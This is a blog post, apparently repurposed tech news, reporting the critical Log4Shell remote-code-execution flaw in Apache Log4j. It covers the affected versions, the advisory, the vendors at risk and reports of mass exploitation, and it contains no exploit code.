Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk

The Apache Software Foundation has released fixes to contain an actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.

Tracked as CVE-2021–44228 and by the monikers Log4Shell or LogJam, the issue concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue.

“An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” the Apache Foundation said in an advisory. “From Log4j 2.15.0, this behavior has been disabled by default.”

Exploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. The project maintainers credited Chen Zhaojun of Alibaba Cloud Security Team with discovering the issue.

Log4j is used as a logging package in a variety of different popular software by a number of manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft. In the case of the latter, attackers have been able to gain RCE on Minecraft Servers by simply pasting a specially crafted message into the chat box.

A huge attack surface

“The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year,” said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys. “Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit.”

Cybersecurity firms BitDefender, Cisco Talos, Huntress Labs, and Sonatype have all confirmed evidence of mass scanning of affected applications in the wild for vulnerable servers and attacks registered against their honeypot networks following the availability of a proof-of-concept (PoC) exploit. “This is a low skilled attack that is extremely simple to execute,” Sonatype’s Ilkka Turunen said.

--

--

--

Tech enthusiastic, life explorer, single, motivator, blogger, writer, software engineer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

RansomWare — Handsome Threat

Cartesi’s RSS Feed is Now Integrated with Crypto.com’s CTSI Page

Secret Code

WEEK IN OSINT 005; WHO ARE BEHIND THE CREATING OF DGSOUK.COM “DUBAI GOLD SOUK ONLINE INVESTMENT”

Buy Verified Cash App Account with BTC Enable

Security Trivia Series: Hints on default-src CSP directive

A new JavaScript-based remote access Trojan (RAT) propagated via a social engineering campaign has…

We are getting set to bring the #NEXTBIGTHING to the #cryptospace be on the lookout.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
TechGuy

TechGuy

Tech enthusiastic, life explorer, single, motivator, blogger, writer, software engineer

More from Medium

Intro to LAN

All aboard the merge train

Y-Chart in VLSI

How long should a Basic Assessment take under the DoD Assessment Methodology?